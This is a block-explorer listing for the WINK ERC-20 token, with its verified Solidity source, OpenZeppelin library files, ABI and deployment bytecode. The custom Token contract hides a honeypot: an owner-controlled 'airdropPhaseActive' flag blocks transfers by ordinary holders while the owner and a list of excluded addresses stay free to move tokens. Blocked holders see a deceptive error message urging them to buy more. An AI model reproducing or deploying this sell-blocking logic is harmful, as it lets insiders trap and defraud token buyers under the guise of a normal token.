ERC-20
Source Code
Overview
Max Total Supply
386,000,000 WINK
Holders
23
Transfers
-
0
Market
Onchain Market Cap
-
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
| # | Exchange | Pair | Price | 24H Volume | % Volume |
|---|
Contract Name:
Token
Compiler Version
v0.8.28+commit.7893614a
Optimization Enabled:
Yes with 200 runs
Other Settings:
paris EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
//xx
contract Token is ERC20 {
address public exceptionAddress;
address[] public excludedAddresses;
bool public airdropPhaseActive;
address public liquidityPool;
address public owner;
event AirdropPhaseToggled(bool active);
event LiquidityPoolSet(address pool);
constructor(
string memory name,
string memory symbol,
uint256 initialSupply,
address _exceptionAddress,
address[] memory _excludedAddresses
) ERC20(name, symbol) {
_mint(msg.sender, initialSupply * 10 ** decimals());
exceptionAddress = _exceptionAddress;
excludedAddresses = _excludedAddresses;
owner = msg.sender;
airdropPhaseActive = false;
emit AirdropPhaseToggled(false);
}
modifier onlyOwner() {
require(msg.sender == owner, "Only owner can call this function");
_;
}
function toggleAirdropPhase(bool active) public onlyOwner {
airdropPhaseActive = active;
emit AirdropPhaseToggled(active);
}
function setLiquidityPool(address pool) public onlyOwner {
liquidityPool = pool;
emit LiquidityPoolSet(pool);
}
function transfer(address to, uint256 amount) public virtual override returns (bool) {
bool isExcludedSender = isExcluded(_msgSender()) || _msgSender() == owner;
require(!airdropPhaseActive || isExcludedSender, "You have to buy more tokens to be able to sell all amount. Thank you!");
return super.transfer(to, amount);
}
function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
bool isExcludedSender = isExcluded(from) || from == owner;
bool isBuy = from == liquidityPool;
require(!airdropPhaseActive || isExcludedSender || isBuy, "You have to buy more tokens to be able to sell all amount. Thank you!");
return super.transferFrom(from, to, amount);
}
function isExcluded(address account) internal view returns (bool) {
if (account == exceptionAddress) return true;
if (account == liquidityPool && liquidityPool != address(0)) return true;
for (uint256 i = 0; i < excludedAddresses.length; i++) {
if (excludedAddresses[i] == account) return true;
}
return false;
}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)
pragma solidity ^0.8.0;
import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";
import "../../utils/Context.sol";
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
* For a generic mechanism see {ERC20PresetMinterPauser}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC20
* applications.
*
* Additionally, an {Approval} event is emitted on calls to {transferFrom}.
* This allows applications to reconstruct the allowance for all accounts just
* by listening to said events. Other implementations of the EIP may not emit
* these events, as it isn't required by the specification.
*
* Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
* functions have been added to mitigate the well-known issues around setting
* allowances. See {IERC20-approve}.
*/
contract ERC20 is Context, IERC20, IERC20Metadata {
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
/**
* @dev Sets the values for {name} and {symbol}.
*
* All two of these values are immutable: they can only be set once during
* construction.
*/
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual override returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual override returns (uint8) {
return 18;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view virtual override returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `amount`.
*/
function transfer(address to, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_transfer(owner, to, amount);
return true;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(address owner, address spender) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 amount) public virtual override returns (bool) {
address owner = _msgSender();
_approve(owner, spender, amount);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* - the caller must have allowance for ``from``'s tokens of at least
* `amount`.
*/
function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, amount);
_transfer(from, to, amount);
return true;
}
/**
* @dev Atomically increases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, allowance(owner, spender) + addedValue);
return true;
}
/**
* @dev Atomically decreases the allowance granted to `spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `spender` cannot be the zero address.
* - `spender` must have allowance for the caller of at least
* `subtractedValue`.
*/
function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
address owner = _msgSender();
uint256 currentAllowance = allowance(owner, spender);
require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
unchecked {
_approve(owner, spender, currentAllowance - subtractedValue);
}
return true;
}
/**
* @dev Moves `amount` of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `from` cannot be the zero address.
* - `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
*/
function _transfer(address from, address to, uint256 amount) internal virtual {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
_beforeTokenTransfer(from, to, amount);
uint256 fromBalance = _balances[from];
require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
unchecked {
_balances[from] = fromBalance - amount;
// Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
// decrementing then incrementing.
_balances[to] += amount;
}
emit Transfer(from, to, amount);
_afterTokenTransfer(from, to, amount);
}
/** @dev Creates `amount` tokens and assigns them to `account`, increasing
* the total supply.
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* Requirements:
*
* - `account` cannot be the zero address.
*/
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_beforeTokenTransfer(address(0), account, amount);
_totalSupply += amount;
unchecked {
// Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
_balances[account] += amount;
}
emit Transfer(address(0), account, amount);
_afterTokenTransfer(address(0), account, amount);
}
/**
* @dev Destroys `amount` tokens from `account`, reducing the
* total supply.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* Requirements:
*
* - `account` cannot be the zero address.
* - `account` must have at least `amount` tokens.
*/
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: burn from the zero address");
_beforeTokenTransfer(account, address(0), amount);
uint256 accountBalance = _balances[account];
require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
unchecked {
_balances[account] = accountBalance - amount;
// Overflow not possible: amount <= accountBalance <= totalSupply.
_totalSupply -= amount;
}
emit Transfer(account, address(0), amount);
_afterTokenTransfer(account, address(0), amount);
}
/**
* @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*/
function _approve(address owner, address spender, uint256 amount) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
/**
* @dev Updates `owner` s allowance for `spender` based on spent `amount`.
*
* Does not update the allowance amount in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Might emit an {Approval} event.
*/
function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
require(currentAllowance >= amount, "ERC20: insufficient allowance");
unchecked {
_approve(owner, spender, currentAllowance - amount);
}
}
}
/**
* @dev Hook that is called before any transfer of tokens. This includes
* minting and burning.
*
* Calling conditions:
*
* - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
* will be transferred to `to`.
* - when `from` is zero, `amount` tokens will be minted for `to`.
* - when `to` is zero, `amount` of ``from``'s tokens will be burned.
* - `from` and `to` are never both zero.
*
* To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
*/
function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}
/**
* @dev Hook that is called after any transfer of tokens. This includes
* minting and burning.
*
* Calling conditions:
*
* - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
* has been transferred to `to`.
* - when `from` is zero, `amount` tokens have been minted for `to`.
* - when `to` is zero, `amount` of ``from``'s tokens have been burned.
* - `from` and `to` are never both zero.
*
* To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
*/
function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)
pragma solidity ^0.8.0;
import "../IERC20.sol";
/**
* @dev Interface for the optional metadata functions from the ERC20 standard.
*
* _Available since v4.1._
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)
pragma solidity ^0.8.0;
/**
* @dev Interface of the ERC20 standard as defined in the EIP.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 amount) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `from` to `to` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address from, address to, uint256 amount) external returns (bool);
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.4) (utils/Context.sol)
pragma solidity ^0.8.0;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}{
"optimizer": {
"enabled": true,
"runs": 200
},
"evmVersion": "paris",
"metadata": {
"bytecodeHash": "ipfs"
},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
},
"libraries": {}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"uint256","name":"initialSupply","type":"uint256"},{"internalType":"address","name":"_exceptionAddress","type":"address"},{"internalType":"address[]","name":"_excludedAddresses","type":"address[]"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"active","type":"bool"}],"name":"AirdropPhaseToggled","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"pool","type":"address"}],"name":"LiquidityPoolSet","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"airdropPhaseActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"exceptionAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"excludedAddresses","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"liquidityPool","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pool","type":"address"}],"name":"setLiquidityPool","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"active","type":"bool"}],"name":"toggleAirdropPhase","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
608060405234801561001057600080fd5b5060405161141138038061141183398101604081905261002f91610330565b8484600361003d83826104df565b50600461004a82826104df565b5050506100793361005f61010260201b60201c565b61006a90600a61069c565b61007490866106b2565b610107565b600580546001600160a01b0319166001600160a01b03841617905580516100a79060069060208401906101cf565b50600880546001600160a01b031916331790556007805460ff19169055604051600081527fe1e05f8608a3aa686fa8e136a92a94b35d2971078f20ecacbf75e892a029a6389060200160405180910390a150505050506106dc565b601290565b6001600160a01b0382166101615760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b806002600082825461017391906106c9565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b828054828255906000526020600020908101928215610224579160200282015b8281111561022457825182546001600160a01b0319166001600160a01b039091161782556020909201916001909101906101ef565b50610230929150610234565b5090565b5b808211156102305760008155600101610235565b634e487b7160e01b600052604160045260246000fd5b604051601f8201601f191681016001600160401b038111828210171561028757610287610249565b604052919050565b600082601f8301126102a057600080fd5b81516001600160401b038111156102b9576102b9610249565b6102cc601f8201601f191660200161025f565b8181528460208386010111156102e157600080fd5b60005b82811015610300576020818601810151838301820152016102e4565b506000918101602001919091529392505050565b80516001600160a01b038116811461032b57600080fd5b919050565b600080600080600060a0868803121561034857600080fd5b85516001600160401b0381111561035e57600080fd5b61036a8882890161028f565b602088015190965090506001600160401b0381111561038857600080fd5b6103948882890161028f565b945050604086015192506103aa60608701610314565b60808701519092506001600160401b038111156103c657600080fd5b8601601f810188136103d757600080fd5b80516001600160401b038111156103f0576103f0610249565b8060051b6104006020820161025f565b9182526020818401810192908101908b84111561041c57600080fd5b6020850194505b838510156104455761043485610314565b825260209485019490910190610423565b80955050505050509295509295909350565b600181811c9082168061046b57607f821691505b60208210810361048b57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156101ca57806000526020600020601f840160051c810160208510156104b85750805b601f840160051c820191505b818110156104d857600081556001016104c4565b5050505050565b81516001600160401b038111156104f8576104f8610249565b61050c816105068454610457565b84610491565b6020601f82116001811461054057600083156105285750848201515b600019600385901b1c1916600184901b1784556104d8565b600084815260208120601f198516915b828110156105705787850151825560209485019460019092019101610550565b508482101561058e5786840151600019600387901b60f8161c191681555b50505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b6001815b60018411156105ee578085048111156105d2576105d261059d565b60018416156105e057908102905b60019390931c9280026105b7565b935093915050565b60008261060557506001610696565b8161061257506000610696565b816001811461062857600281146106325761064e565b6001915050610696565b60ff8411156106435761064361059d565b50506001821b610696565b5060208310610133831016604e8410600b8410161715610671575081810a610696565b61067e60001984846105b3565b80600019048211156106925761069261059d565b0290505b92915050565b60006106ab60ff8416836105f6565b9392505050565b80820281158282048414176106965761069661059d565b808201808211156106965761069661059d565b610d26806106eb6000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c8063665a11ca116100a257806395d89b411161007157806395d89b4114610257578063a457c2d71461025f578063a9059cbb14610272578063a9e7c0f414610285578063dd62ed3e1461029857600080fd5b8063665a11ca146101f057806370a08231146102085780637cff3fa8146102315780638da5cb5b1461024457600080fd5b806323b872dd116100e957806323b872dd146101835780632f4c467814610196578063313ce567146101c157806339509351146101d057806348d77917146101e357600080fd5b8063018770201461011b57806306fdde0314610130578063095ea7b31461014e57806318160ddd14610171575b600080fd5b61012e610129366004610a8e565b6102ab565b005b61013861033b565b6040516101459190610ab0565b60405180910390f35b61016161015c366004610afe565b6103cd565b6040519015158152602001610145565b6002545b604051908152602001610145565b610161610191366004610b28565b6103e7565b6101a96101a4366004610b65565b61046b565b6040516001600160a01b039091168152602001610145565b60405160128152602001610145565b6101616101de366004610afe565b610495565b6007546101619060ff1681565b6007546101a99061010090046001600160a01b031681565b610175610216366004610a8e565b6001600160a01b031660009081526020819052604090205490565b61012e61023f366004610b7e565b6104b7565b6008546101a9906001600160a01b031681565b610138610522565b61016161026d366004610afe565b610531565b610161610280366004610afe565b6105b7565b6005546101a9906001600160a01b031681565b6101756102a6366004610ba0565b610621565b6008546001600160a01b031633146102de5760405162461bcd60e51b81526004016102d590610bd3565b60405180910390fd5b60078054610100600160a81b0319166101006001600160a01b038416908102919091179091556040519081527fe57f71636571365571c0eaeaeb54e1d9e0065804f056a57a2a29448524f7d18a906020015b60405180910390a150565b60606003805461034a90610c14565b80601f016020809104026020016040519081016040528092919081815260200182805461037690610c14565b80156103c35780601f10610398576101008083540402835291602001916103c3565b820191906000526020600020905b8154815290600101906020018083116103a657829003601f168201915b5050505050905090565b6000336103db81858561064c565b60019150505b92915050565b6000806103f385610770565b8061040b57506008546001600160a01b038681169116145b60075490915061010081046001600160a01b03908116908716149060ff1615806104325750815b8061043a5750805b6104565760405162461bcd60e51b81526004016102d590610c4e565b61046186868661082d565b9695505050505050565b6006818154811061047b57600080fd5b6000918252602090912001546001600160a01b0316905081565b6000336103db8185856104a88383610621565b6104b29190610cb9565b61064c565b6008546001600160a01b031633146104e15760405162461bcd60e51b81526004016102d590610bd3565b6007805460ff19168215159081179091556040519081527fe1e05f8608a3aa686fa8e136a92a94b35d2971078f20ecacbf75e892a029a63890602001610330565b60606004805461034a90610c14565b6000338161053f8286610621565b90508381101561059f5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016102d5565b6105ac828686840361064c565b506001949350505050565b6000806105c333610770565b806105e157506008546001600160a01b0316336001600160a01b0316145b60075490915060ff1615806105f35750805b61060f5760405162461bcd60e51b81526004016102d590610c4e565b6106198484610846565b949350505050565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b0383166106ae5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016102d5565b6001600160a01b03821661070f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016102d5565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6005546000906001600160a01b039081169083160361079157506001919050565b6007546001600160a01b03838116610100909204161480156107c2575060075461010090046001600160a01b031615155b156107cf57506001919050565b60005b60065481101561082457826001600160a01b0316600682815481106107f9576107f9610cda565b6000918252602090912001546001600160a01b03160361081c5750600192915050565b6001016107d2565b50600092915050565b60003361083b858285610854565b6105ac8585856108ce565b6000336103db8185856108ce565b60006108608484610621565b905060001981146108c857818110156108bb5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016102d5565b6108c8848484840361064c565b50505050565b6001600160a01b0383166109325760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016102d5565b6001600160a01b0382166109945760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016102d5565b6001600160a01b03831660009081526020819052604090205481811015610a0c5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016102d5565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36108c8565b80356001600160a01b0381168114610a8957600080fd5b919050565b600060208284031215610aa057600080fd5b610aa982610a72565b9392505050565b602081526000825180602084015260005b81811015610ade5760208186018101516040868401015201610ac1565b506000604082850101526040601f19601f83011684010191505092915050565b60008060408385031215610b1157600080fd5b610b1a83610a72565b946020939093013593505050565b600080600060608486031215610b3d57600080fd5b610b4684610a72565b9250610b5460208501610a72565b929592945050506040919091013590565b600060208284031215610b7757600080fd5b5035919050565b600060208284031215610b9057600080fd5b81358015158114610aa957600080fd5b60008060408385031215610bb357600080fd5b610bbc83610a72565b9150610bca60208401610a72565b90509250929050565b60208082526021908201527f4f6e6c79206f776e65722063616e2063616c6c20746869732066756e6374696f6040820152603760f91b606082015260800190565b600181811c90821680610c2857607f821691505b602082108103610c4857634e487b7160e01b600052602260045260246000fd5b50919050565b60208082526045908201527f596f75206861766520746f20627579206d6f726520746f6b656e7320746f206260408201527f652061626c6520746f2073656c6c20616c6c20616d6f756e742e205468616e6b60608201526420796f752160d81b608082015260a00190565b808201808211156103e157634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052603260045260246000fdfea2646970667358221220dc18e307444bfd3e3ce1f49e72236ce96823a4e0358e716ea04a424d3162d47264736f6c634300081c003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e0000000000000000000000000000000000000000000000000000000001701e480000000000000000000000000feb72ad991bc20d902c46c97a9ff3c6d23aed11a0000000000000000000000000000000000000000000000000000000000000120000000000000000000000000000000000000000000000000000000000000000857696e6b57616473000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000457494e4b0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000140000000000000000000000002a6907df19a58956a15be8ab581fef024bc25569000000000000000000000000a49525ffe1b45af57924d583d8689cb99e488448000000000000000000000000962a7ea7b86ba5d71c0c41984cb1d8d059e21e6b000000000000000000000000fe96ade32d7407c8d8c8ef25ecc558cf4744934f0000000000000000000000009d3c725186fcc40202607cec135679b5e8be43b80000000000000000000000005a0311015f3a43cd48a61c07f4d190868f4e7c11000000000000000000000000d5ffa812f8de1b6851faffccccbd2f903638da8d000000000000000000000000edfb8a9f2008690113d9e850eb8d148e37ce8e5b0000000000000000000000003d30ce81c678c69c15586cc49fa099eb0ddbfe140000000000000000000000004254696d7ba52ed730d6396b35e78ef4961ed3dc00000000000000000000000070a508c552a6817bbfa660073968b5c66cb367640000000000000000000000003de53f6e7e3b992501574a387f4852e8d96015de0000000000000000000000008a47bf090a2e878627e1f7546858359f1952d1730000000000000000000000001143050d3d28d3c2d34bee8af65502db8f17b7850000000000000000000000000ff54e4214fbdb8082f97a5afbb957a82a31b036000000000000000000000000e0020a8100c509d75258cfe5ba30593561c69dbe000000000000000000000000682f39fc0f3c4c3a4f97966ee7c99e4855709619000000000000000000000000c16a62710b9e743d591474741a43e51044b01e1e000000000000000000000000c4dfec41d1c551d68fcf9693aa819539e0df1d4b00000000000000000000000014a3582c37a3647bb1d3f5827d3a2c54e60d0295
Deployed Bytecode
